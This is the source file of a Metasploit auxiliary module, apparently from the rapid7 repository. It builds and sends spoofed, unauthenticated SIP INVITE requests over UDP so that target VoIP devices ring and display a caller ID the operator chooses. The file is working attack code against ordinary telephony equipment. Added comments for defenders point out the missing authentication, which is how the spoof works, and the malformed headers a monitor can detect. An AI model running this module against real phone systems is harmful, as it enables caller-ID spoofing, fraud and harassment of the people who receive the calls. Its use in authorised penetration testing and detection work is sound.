GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/auxiliary/voip/sip_invite_spoof.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
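# Auxiliary scanner module that sends one unauthenticated SIP INVITE over UDP
# to each target host, with operator-chosen caller identity fields.
#
# Reviewer notes for defenders, based on the request built in #run_host:
# - The From display name and URI come straight from the MSG and SRCADDR
#   options, and the request carries no credentials. Caller ID shown by a
#   device that accepts such a request is therefore not trustworthy.
#   Requiring authentication on INVITE, or accepting signalling only from
#   the registered proxy, is the usual mitigation (deployment-specific).
# - The request is not a well-formed RFC 3261 message: the Via header has no
#   branch parameter and the From header has no tag. The Call-ID is a number
#   in 100..199 followed by the target IP. These traits are usable as
#   detection signals on a SIP-aware monitor.
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::Udp
  include Msf::Auxiliary::Scanner

  # Registers the module metadata, the standard options (RPORT, SRCADDR, MSG,
  # EXTENSION, DOMAIN) and the advanced SIP proxy options.
  def initialize
    super(
      'Name' => 'SIP Invite Spoof',
      'Description' => %q{
        This module will create a fake SIP invite request making the targeted device ring
        and display fake caller id information.
      },
      'Author' =>
        [
          'David Maynor <dave[at]erratasec.com>', # original module
          'ChrisJohnRiley' # modifications
        ],
      'License' => MSF_LICENSE
    )

    deregister_udp_options
    register_options(
      [
        Opt::RPORT(5060),
        OptString.new('SRCADDR', [true, "The sip address the spoofed call is coming from",'192.168.1.1']),
        OptString.new('MSG', [true, "The spoofed caller id to send","The Metasploit has you"]),
        OptString.new('EXTENSION', [false, "The specific extension or name to target", nil]),
        OptString.new('DOMAIN', [false, "Use a specific SIP domain", nil])
      ])
    register_advanced_options(
      [
        OptAddress.new('SIP_PROXY_NAME', [false, "Use a specific SIP proxy", nil]),
        OptPort.new('SIP_PROXY_PORT', [false, "SIP Proxy port to use", 5060])
      ])
  end

  # Builds one INVITE for the given host and sends it over UDP.
  #
  # The request URI, To and Contact headers all use the same
  # "[EXTENSION@](DOMAIN|ip)" string. No response is read.
  #
  # @param ip [String] address of the host currently being processed
  # @return [void]
  def run_host(ip)
    name = datastore['MSG']
    src = datastore['SRCADDR']
    ext = datastore['EXTENSION']
    dom = datastore['DOMAIN']
    sphost = datastore['SIP_PROXY_NAME']
    spport = datastore['SIP_PROXY_PORT'] || 5060

    # Optional "user@" prefix, then the SIP domain if one was given,
    # otherwise the target address itself.
    user_part = ext.nil? || ext.empty? ? '' : "#{ext}@"
    host_part = dom.nil? || dom.empty? ? ip : dom
    conn_string = "#{user_part}#{host_part}"

    # Route header is only emitted when a SIP proxy is configured;
    # route stays nil otherwise.
    route = "Route: <sip:#{sphost}:#{spport};lr>\r\n" unless sphost.nil? || sphost.empty?

    connect_udp
    begin
      print_status("Sending Fake SIP Invite to: #{conn_string}")
      print_status("Using SIP proxy #{sphost}:#{spport}") if route

      req = "INVITE sip:#{conn_string} SIP/2.0\r\n"
      req << route if route
      req << "To: <sip:#{conn_string}>\r\n"
      req << "Via: SIP/2.0/UDP #{ip}\r\n"
      req << "From: \"#{name}\"<sip:#{src}>\r\n"
      req << "Call-ID: #{(rand(100) + 100)}#{ip}\r\n"
      req << "CSeq: 1 INVITE\r\n"
      req << "Max-Forwards: 20\r\n"
      req << "Contact: <sip:#{conn_string}>\r\n\r\n"

      udp_sock.put(req)
    ensure
      # Close the socket even when building or sending the request raises.
      disconnect_udp
    end
  rescue Errno::EACCES => e
    # Previously swallowed silently; report it so a skipped host is visible
    # in the run output.
    print_error("#{ip} - SIP INVITE not sent: #{e.message}")
  end
end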